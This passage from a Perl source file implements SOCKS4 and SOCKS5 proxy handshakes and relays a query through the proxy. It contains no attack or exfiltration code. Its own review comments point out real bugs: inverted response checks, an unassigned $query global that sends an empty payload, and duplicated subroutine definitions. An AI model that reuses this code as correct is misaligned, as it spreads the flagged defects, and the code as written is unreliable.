  10915.           my @bytes = unpack 'C*', $resp;
  10916.           @bytes = map {sprintf '%.2x', $_} @bytes; # hex rendering of the reply; computed but never used
  10917.           my $code = ord (substr $resp, 0, 1);
  10918.           return {'code' => -2, 'message' => 'Not Socks5 proxy'} unless $code == 5;
  10919.           $code = ord (substr $resp, 1, 1);
  10920.           return {'code' => -3, 'message' => '\'No authentication\' method not supported'} unless $code == 0;
  10921.           syswrite $sock, $sk5_conn1, length $sk5_conn1;
  10922.           sysread $sock, $resp, 10; # CONNECT reply for an IPv4 bind address: VER, REP, RSV, ATYP, 4-byte addr, 2-byte port
  10923.           return {'code' => -4, 'message' => 'Empty response'}
  10924.           if length $resp == 0 or not defined $resp;
  10925.           return {'code' => -1, 'message' => 'Too short second response from proxy'} if length $resp < 10;
  10926.           @bytes = unpack 'C*', $resp;
  10927.           @bytes = map {sprintf '%.2x', $_} @bytes;
  10928.           $code = ord (substr $resp, 1, 1); # REP: 0 = succeeded
  10929.           return {'code' => -5, 'message' => 'Connection rejected'} unless $code == 0;
  10930.           $code = substr $resp, 4, 4; # BND.ADDR
  10931.           return {'code' => -6, 'message' => 'SOCKS5 error'} if $code eq "\x00" x 4;
  10932.           undef $resp;
  10933.           $resp = send_query ($sock, $query); # $query is the unassigned package global
  10934.           return {'code' => -7, 'message' => 'Cannot connect to check URL. Please change it'}
  10935.           unless $resp =~ /200 OK/ or defined $resp; # NOTE(review): same inverted condition as in socks4 -- only an undefined $resp triggers this return
  10936.           my $ret = parse_content ($resp);
  10937.           close $sock;
  10938.           return $ret;
  10939.      }
  10940. }
  10941. sub socks_get {
            # Runs one SOCKS CONNECT through the proxy named by the package globals
            # $current_proxy_host / $current_proxy_port, as SOCKS4 when $socks_type is
            # 4 and as SOCKS5 otherwise, using $timeout as the connect timeout, and
            # returns only the 'message' part of the result: the data the peer sent
            # back on success, or an error text on failure (callers cannot tell the
            # two apart from the return value alone). Unlike socks_check, $check_host
            # is not assigned here; whatever an earlier caller left in it is resolved.
  10942.     $check_port = 80;
  10943.     my $check_hostent = gethostbyname ($check_host); # scalar context: packed 4-byte IPv4 address, undef when the lookup fails
            # SOCKS4 CONNECT request: VN=4, CD=1, DSTPORT, DSTIP, empty USERID + NUL.
  10944.     our $sk4_conn = "\x04"
  10945.                   . "\x01"
  10946.                   . pack ('n', $check_port)
  10947.                   . $check_hostent
  10948.                   . "\x00";
            # SOCKS5 greeting: VER=5, one method offered, method 0 = no authentication.
  10949.     our $sk5_conn0 = "\x05"
  10950.                    . "\x01"
  10951.                    . "\x00";
            # SOCKS5 CONNECT request: VER=5, CMD=1, RSV=0, ATYP=1 (IPv4), DST.ADDR, DST.PORT.
  10952.     our $sk5_conn1 = "\x05"
  10953.                    . "\x01"
  10954.                    . "\x00"
  10955.                    . "\x01"
  10956.                    . $check_hostent
  10957.                    . pack ('n', $check_port);
  10958.     $s_host = $current_proxy_host;
  10959.     $s_port = $current_proxy_port;
  10960.     if ($socks_type == 4) {
  10961.          $res1 = socks4($s_host,$s_port,$timeout);
  10962.          return $res1->{'message'};
  10963.     } else {
  10964.          $res1 = socks5($s_host,$s_port,$timeout);
  10965.          return $res1->{'message'};
  10966.     }
            # The four helpers below are package-level subs (Perl does not nest named
            # subs) and carry the same names as the ones written inside socks_check
            # earlier in this file; being defined later, these bodies are the ones
            # both callers actually run ("Subroutine redefined" under warnings).
            # send_query: write the given payload and read until EOF or a read error,
            # with no read timeout. Its callers pass the package global $query, which
            # is not assigned anywhere visible, so an empty payload goes out.
  10967.     sub send_query {
  10968.          my ($sock, $query) = @_;
  10969.          syswrite $sock, $query, length $query;
  10970.          my ($resp, $buf);
  10971.          $resp .= $buf while sysread $sock, $buf, 4098;
  10972.          return $resp;
  10973.     }
            # parse_content: wrap a raw response as {code, message} -- code 0 with the
            # data when anything came back, -1 with an empty message otherwise.
  10974.     sub parse_content {
  10975.          my $content = shift;
  10976.          my %ret;
  10977.          if ($content) {
  10978.              ($ret{'code'}, $ret{'message'}) = (0, $content);
  10979.          } else {
  10980.              ($ret{'code'}, $ret{'message'}) = (-1, "");
  10981.          }
  10982.          return \%ret;
  10983.     }
            # socks4: connect to the proxy, send $sk4_conn, validate the 8-byte reply
            # (VN 0 or 4, CD 0x5a = request granted), then relay via send_query and
            # return parse_content()'s {code, message}; failures return a negative code.
  10984.     sub socks4 {
  10985.          my ($proxy_host, $proxy_port, $timeout1) = @_;
  10986.          my $sock = IO::Socket::INET->new (
  10987.                      'PeerAddr' => $proxy_host,
  10988.                      'PeerPort' => $proxy_port,
  10989.                      'Proto' => 'tcp',
  10990.                      'Timeout' => $timeout1
  10991.                      ) or return {'code' => -1, 'message' => "Connection error: $@"};
  10992.          syswrite $sock, $sk4_conn, length $sk4_conn;
  10993.          my $resp;
  10994.          sysread $sock, $resp, 8; # the proxy's reply must be 8 bytes long
  10995.          return {'code' => -1, 'message' => 'Empty response'}
  10996.          if length $resp == 0 or not defined $resp;
  10997.          return {'code' => -1, 'message' => 'Too short response from proxy'} if length $resp < 8;
  10998.          my @bytes = unpack 'C*', $resp;
  10999.          @bytes = map {sprintf '%.2x', $_} @bytes; # hex rendering of the reply; computed but never used
  11000.          my $code = ord (substr $resp, 0, 1); # VN byte
  11001.          return {'code' => -2, 'message' => 'Not Socks4 proxy'} unless $code == 0 or $code == 4;
  11002.          $code = ord (substr $resp, 1, 1); # CD byte
  11003.          return {'code' => -3, 'message' => 'Request rejected'} unless $code == 0x5a;
  11004.          undef $resp;
  11005.          $resp = send_query ($sock, $query); # $query is the unassigned package global
  11006.          return {'code' => -5, 'message' => 'Cannot connect to check URL. Please check it'}
  11007.          unless $resp =~ /200 OK/ or defined $resp; # NOTE(review): "or defined $resp" means this only returns for an undefined $resp; a defined reply without "200 OK" passes through
  11008.          my $ret = parse_content ($resp);
  11009.          close $sock;
  11010.          return $ret;
  11011.     }
            # socks5: send the greeting and expect VER=5 / METHOD=0, send the CONNECT
            # request and expect REP=0 with a non-zero BND.ADDR, then relay via
            # send_query exactly as socks4 does.
  11012.     sub socks5 {
  11013.          my ($proxy_host, $proxy_port, $timeout1) = @_;
  11014.          my $sock = IO::Socket::INET->new (
  11015.                      'PeerAddr' => $proxy_host,
  11016.                      'PeerPort' => $proxy_port,
  11017.                      'Proto' => 'tcp',
  11018.                      'Timeout' => $timeout1
  11019.                      ) or return {'code' => -1, 'message' => "Connection error: $@"};
  11020.          syswrite $sock, $sk5_conn0, length $sk5_conn0;
  11021.          my $resp;
  11022.          sysread $sock, $resp, 2; # method-selection reply: VER, METHOD
  11023.          return {'code' => -1, 'message' => 'Too short first response from server'} if length $resp < 2;
  11024.          my @bytes = unpack 'C*', $resp;
  11025.          @bytes = map {sprintf '%.2x', $_} @bytes; # hex rendering of the reply; computed but never used
  11026.          my $code = ord (substr $resp, 0, 1);
  11027.          return {'code' => -2, 'message' => 'Not Socks5 proxy'} unless $code == 5;
  11028.          $code = ord (substr $resp, 1, 1);
  11029.          return {'code' => -3, 'message' => '\'No authentication\' method not supported'} unless $code == 0;
  11030.          syswrite $sock, $sk5_conn1, length $sk5_conn1;
  11031.          sysread $sock, $resp, 10; # CONNECT reply for an IPv4 bind address: VER, REP, RSV, ATYP, 4-byte addr, 2-byte port
  11032.          return {'code' => -4, 'message' => 'Empty response'}
  11033.          if length $resp == 0 or not defined $resp;
  11034.          return {'code' => -1, 'message' => 'Too short second response from proxy'} if length $resp < 10;
  11035.          @bytes = unpack 'C*', $resp;
  11036.          @bytes = map {sprintf '%.2x', $_} @bytes;
  11037.          $code = ord (substr $resp, 1, 1); # REP: 0 = succeeded
  11038.          return {'code' => -5, 'message' => 'Connection rejected'} unless $code == 0;
  11039.          $code = substr $resp, 4, 4; # BND.ADDR
  11040.          return {'code' => -6, 'message' => 'SOCKS5 error'} if $code eq "\x00" x 4;
  11041.          undef $resp;
  11042.          $resp = send_query ($sock, $query); # $query is the unassigned package global
  11043.          return {'code' => -7, 'message' => 'Cannot connect to check URL. Please change it'}
  11044.          unless $resp =~ /200 OK/ or defined $resp; # NOTE(review): same inverted condition as in socks4 -- only an undefined $resp triggers this return
  11045.          my $ret = parse_content ($resp);
  11046.          close $sock;
  11047.          return $ret;
  11048.     }
  11049. }